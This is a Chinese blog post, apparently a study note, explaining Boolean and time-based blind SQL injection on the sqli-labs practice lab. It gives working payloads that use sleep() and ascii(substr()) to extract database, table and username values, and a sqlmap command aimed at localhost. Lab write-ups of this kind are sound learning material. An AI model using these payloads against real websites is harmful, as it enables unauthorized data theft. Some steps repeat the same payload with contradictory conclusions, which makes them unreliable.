基于GET的盲注

最新推荐文章于 2022-12-29 23:39:11 发布
最新推荐文章于 2022-12-29 23:39:11 发布
阅读量573 收藏
点赞数
分类专栏: 学习归纳 文章标签: GET报错 SQL注入 盲注 sqlmap sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/104261818
版权

盲注介绍
在这里插入图片描述
先进行Boolean盲注,若实在不行再进行时间盲注
GET基于Boolean的盲注,实验:sqli-labs less -8

输入:?id=1' and length(database()) = 10 --+
输出:无任何信息
由此证明:数据库数为10错误
输入:?id=1' and length(database()) = 8 --+
输出:You are in...........
由此证明:数据库数为8正确

GET基于时间的盲注,实验:sqli-labs less -9
使用IF(查询语句,1,sleep(5)),即如果我们的查询语句为真,那么直接返回结果;如果我们的查询语句为假,那么过5秒之后返回页面。所以我们就根据返回页面的时间长短来判断我们的查询语句是否执行正确,即我们的出发点就回到了之前的基于布尔的SQL盲注,也就是构造查询语句来判断结果是否为真。
步骤一 枚举出当前数据库名
先判断能不能基于时间盲注来展开注入错误的语句,等了5秒才返回的,表示错误,立即返回表示正确, 能基于时间的错误进行盲注

输入:?id=1‘ and sleep(5) --+
爆当前数据库名称:使用二分法进行
输入:?id=1' and if(ascii(substr(database(),1,1))>115, 0,sleep(5)) --+

在这里插入图片描述

输出:立刻返回 
由此证明:第一个字母大于114
输入:?id=1' and if(ascii(substr(database(),1,1))>115, 0,sleep(5)) --+

在这里插入图片描述

输出:过了5秒才返回 
由此证明:字母小<115 应该是ascii115对应s
依次类推
......

这里我们假设我们把库名报出来了 我们要爆表名

步骤二 爆表名

输入:?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0,sleep(5)) --+
输出:立即返回
由此证明:大于100成立

输入:?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>105, 0,sleep(5)) --+
输出:过了5秒才返回 
由此证明:那么这是错误的,值在101-105之间
        依次类推,进一步缩小范围,直到锁定准确的值
爆字段名与爆表名同理

步骤三 爆字段值
爆字段值的语句构造方法

?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))>100, 0,sleep(5)) --+

sqlmap安全测试:–technique

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1"  --technique --dbs

在这里插入图片描述

Luckysec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
时间盲注SQL注入
SheXinK’s Blog
12-18 523
时间盲注SQL注入1、 SQL注入介绍2、 报错注入注入PHP代码3、 时间注入测试4、 SQL注入防御 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 报错注入注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,...
sql盲注 解决_SQL注入之基于布尔的盲注详解
weixin_39638086的博客
12-19 554
基于布尔的盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
Get盲注
m0_69676459的博客
05-07 524
今日学习了盲注相关的函数: length(str):返回字符串的长度 sub(str,a,b):从a的位置取出字符串的b个字符。eg.sub('abcd',1,1)='a' ascii(str):取出字符串第一个字符的ascii码值。 if(exp1,exp2,exp3)是一个条件判断语句,exp1位需要判断的语句,exp2是语句为真时执行的语句,exp3是语句为假时执行的语句。 eg.if(select database()= 'username',sleep(15),null)意思为当数据库的
GET注入-盲注
weixin_52620919的博客
11-17 513
盲注,意味着页面不会显示SQL语句的错误,我们要通过一定的手段来判断构造的注入语句是否正确执行。 有两种方式:布尔型和时间型。 布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行,时间型则是根据页面加载时间是否变化来判断的。 相关函数 盲注需要掌握一些MySQL的相关函数: length(str): 返回str字符串的长度。如执行select length(database()) 则会返回当前数据库名称的长度。 而单独selectdatabase()则回返回当前数据库的名称。 substr(
GET型盲注
山兔的博客
08-01 255
一、sql盲注sql注入过程中, sql语句执行的选择后,选择的数据不能回显到前端页面。 类型:基于布尔的SQL盲注、基于时间SQL盲注、基于报错SQL盲注。 Information_schema数据库基本表说明: schemata表:提供了当前mysql实例中所有的数据库信息 tables表:提供了关于数据库中的所有表的信息, columns表:提供表中所有列信息,即表明了表中所有列及每列的信息 任务描述: 注入流程: 1.根据提示加入id参数在url中,可以看到他不再像前面报错注入一样回显有效信
sql_1-2_get基于盲注
weixin_44110913的博客
12-02 365
1
mysql基于时间盲注_MySQL基于时间盲注(Time-Based Blind SQL Injection)五种延时方法...
weixin_42527178的博客
01-19 958
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
基于时间盲注原理简介
m0_38103658的博客
08-30 6395
基于时间盲注 盲注简介 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注原理 盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表...
sqlserver数据库布尔盲注_SQL注入之基于布尔的盲注详解
weixin_30623181的博客
12-24 1273
基于布尔的盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
基于时间盲注SQL注入
weixin_52467668的博客
12-29 359
Information_schema,信息数据库,其中保存有关于MySQL服务器所维护的所有其他数据库的信息,比如数据库名,数据库表,表字段的数据类型,访问权限等。SCHEMATA表:提供当前MySql实例中所有的数据库信息。mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。
SQL注入-GET型-单参数-时间盲注
qq_33505576的博客
09-24 289
1、概要 现在的CTF竞赛,WEB类型的题目,SQL注入可以说是必考题,而且,现在的SQL注入题目越来越难了,各种过滤,所以我们的SQL注入神器SQLMAP基本上可以说是没用了,必须要我们自己写脚本和payload进行手工注入,本篇文章以GET型-单参数-时间盲注为例,总结一下这类题型的做题方法,不喜勿喷。 2、审题 拿到SQL注入的题目,首先要审题,并结合提示看是考察union select注入、报错注入、盲注还是堆叠注入,难题一般都是考察盲注。判断存在什么类型的注入不难,属于基础内容,这里不进一步去展
GET基于布尔、时间盲注
dremcl的博客
03-18 195
SQL语句 SQL语句 显示状态 说明状态 ((select length(database()))> 5) 正常 true ((select length(database()))> 10) 无显示 false ((select ascii(subs...
SQL注入知识点总结
千寻的博客
02-11 1597
文章目录第一章 概述第一节 简介第二章 SQL 注入基础第一节 漏洞原理第二节 注入点可能存在的位置第三节 漏洞危害第三章 SQL注入分类第四章 MYSQL 相关第一节 注释第二节 mysql 元数据库数据库information_schema第三节 MYSQL 常用函数与参数第四节 逻辑运算第五章 注入流程第一节 SQL 注入思路第二节 注入点判断第三节 联合查询第四节 报错注入第五节 ...
SQL注入——GET数字布尔盲注
weixin_44889655的博客
10-12 463
GET数字布尔盲注——墨者学院手工注入工具注入 手工注入 判断注入点 http://219.153.49.228:44957/new_list.php?id=1 and 1=1 http://219.153.49.228:44957/new_list.php?id=1 and 1=2 MySQL版本 http://219.153.49.228:44957/new_list.php?id=1 and substring(version(),1,1)=1 爆库 库长——长度为10 http://
get基于报错sql注入
冷巷(✘_✘)的博客
07-14 1090
目录1.SQL注入的分类数字型字符型2.get基于报错sql注入发现3.get基于报错sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类型可将sql注入分为数字型和字符型。例如 字符型 例如 2.get基于报错sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
MySQL盲注
qq_39654116的博客
01-05 476
这里写目录标题布尔盲注时间盲注sleep函数benchmark函数笛卡尔积函数get_lock盲注正则DOS RLIKE注入dnslog盲注后续待补充 布尔盲注 盲注一般先看长度 id=4 and length(user())=14 布尔盲注的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
Sqli-labs Less01-04 基于错误的sql注入 - GET
kevinhanser
08-09 851
本文记录 SQL 注入的学习过程,资料为 SQLi-labs Sqli-labs 博客目录 基于错误的 sql 注入 Less - 1: GET - Error based - Single quotes - String 测试漏洞 在 URL 后面添加一个引号 http://10.10.10.137/sqli-labs/Less-1/?id=1' 发现有报错信息...
sql注入--基于报错的注入
weixin_30568591的博客
04-16 119
这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学院的教程)基于报错的注入,如图,在数据库上测试,产生报错 http://localhost/sqlilabs/Less-5/index.php?id=3' and (select...
Sqli-labs 复习 Less01-04 基于错误的sql注入 - GET
kevinhanser
08-10 431
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 基于错误的 sql 注入 Less-01-04 Less-1 基于错误的单引号注入 测试 ?id=1 正常执行 ?id=1' 报错 ?id=1'--+ 不报错 说明可以注释掉 SQL 语句后面的内容 猜字段数 ?id=1' order by 4 --...
python写布尔盲注
最新发布
05-04
下面是一个示例代码,可以实现基于布尔盲注SQL 注入: ```python import requests url = "http://example.com/test.php?id=" # 要注入的 SQL 语句 sql = "select * from users where id=1 and substring...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值